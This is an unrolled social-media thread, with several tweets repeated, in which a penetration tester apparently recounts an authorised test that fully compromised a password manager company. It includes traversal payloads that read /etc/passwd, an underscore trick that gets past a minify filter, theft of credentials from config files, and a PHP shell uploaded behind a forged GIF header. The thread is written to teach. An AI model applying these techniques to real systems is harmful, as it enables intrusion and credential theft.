(a LONG thread) 🧵
Inspired by @infosec_au & @hacker_ here's one of my fun hacker stories:
= The complete compromise of a password manager company =
Here's how I did it (so you can learn):
I was given the project to pentest a password manager company: *.redacted.com
(1/16)
Inspired by @infosec_au & @hacker_ here's one of my fun hacker stories:
= The complete compromise of a password manager company =
Here's how I did it (so you can learn):
I was given the project to pentest a password manager company: *.redacted.com
(1/16)
No physical or phishing. The site was certified McAffee Secure! 😉
The 1st two days were spent doing recon, walking the application, and doing content discovery.
I used the
github.com/danielmiessler…
github.com/danielmiessler…
bruteforce lists for content discovery.
(2/16)
The 1st two days were spent doing recon, walking the application, and doing content discovery.
I used the
github.com/danielmiessler…
github.com/danielmiessler…
bruteforce lists for content discovery.
(2/16)
At this time, I was using dirsearch. (I would use ffuf or feroxbuster these days)
(something like the image)
I discovered, (by proxying the site through Burp Suite and looking at responses and errors), that the application was written in CodeIgniter. Noted this down.
(3/16)
(something like the image)
I discovered, (by proxying the site through Burp Suite and looking at responses and errors), that the application was written in CodeIgniter. Noted this down.
(3/16)
The content discovery yielded several paths, a few of note:
(4/16)
(4/16)
Visiting these gave nothing (to be expected) but I noted them all down.
During spidering an additional path was found on the above:
/123/minify/minfycss/
(5/16)
During spidering an additional path was found on the above:
/123/minify/minfycss/
(5/16)
When doing content discovery, special characters in the lists were giving errors that were interesting. PHP errors having to do with wrong pathing.
I began to expect there might be a path-based Local File Inclusion...
(6/16)
I began to expect there might be a path-based Local File Inclusion...
(6/16)
Fuzzing the path with things like:
/123/minify/minfycss/../../../../../etc/passwd
gave different errors on the incorrect pathing format.
I fuzz things like this with the LFI list in Seclists:
github.com/danielmiessler…
(7/16)
/123/minify/minfycss/../../../../../etc/passwd
gave different errors on the incorrect pathing format.
I fuzz things like this with the LFI list in Seclists:
github.com/danielmiessler…
(7/16)
after MUCH trial and error (and bringing in some fellow testers) we found the correct pathing for /etc/passwd (helped by phpinfo)
The big once was that that the minify function was stripping periods in our ../
but also using underscores (instead) for pathing in nix.
(8/16)
The big once was that that the minify function was stripping periods in our ../
but also using underscores (instead) for pathing in nix.
(8/16)
We ended up doing something like this:
/123/minify/minfycss/__/__/__/__/__/etc/passwd
BAM. It Worked! "root dance" #1
(9/16)
/123/minify/minfycss/__/__/__/__/__/etc/passwd
BAM. It Worked! "root dance" #1
(9/16)
We weren't sure if the underscore behavior was because of a CodeIgniter feature or the way the minify function was written.
So now we could read any file on the webserver.
Pentesting is a circular methodology.
(10/16)
So now we could read any file on the webserver.
Pentesting is a circular methodology.
(10/16)
So we used that vulnerability to pull down all the configuration files for CodeIgniter.
This included multiple API keys.
Remember the database.php file from earlier?
yep... it had database credentials in it!
Remember phpmyadmin? We used those creds there.
(11/16)
This included multiple API keys.
Remember the database.php file from earlier?
yep... it had database credentials in it!
Remember phpmyadmin? We used those creds there.
(11/16)
Boom we had access to the complete database of users.
Enter "root dance" #2
Remember gmail.php?
It contained developer Gmail creds for some sort of integration. We could log into Gmail of the administrator of the company.
Full permissions on Gsuite.
(12/16)
Enter "root dance" #2
Remember gmail.php?
It contained developer Gmail creds for some sort of integration. We could log into Gmail of the administrator of the company.
Full permissions on Gsuite.
(12/16)
We used Phpmyadmin to add ourselves as users to the
/adminpanel
and got access to the backend super user part of the site.
It had the control to do everything. It had all the log access, configs, etc, etc.
(13/16)
/adminpanel
and got access to the backend super user part of the site.
It had the control to do everything. It had all the log access, configs, etc, etc.
(13/16)
We also bypassed their image upload. We were able to upload a PHP shell.
One function checked for images by checking the binary header, but not the file extension (on the server-side). We uploaded a shell with a gif binary header through Burp Suite as a .PHP file
(14/16)
One function checked for images by checking the binary header, but not the file extension (on the server-side). We uploaded a shell with a gif binary header through Burp Suite as a .PHP file
(14/16)
In the end, the methodology and documentation of your hacking are important. Persistence is key.
We had full access to every portion of the company.
(15/15)
We had full access to every portion of the company.
(15/15)
• • •
Missing some Tweet in this thread? You can try to
force a refresh
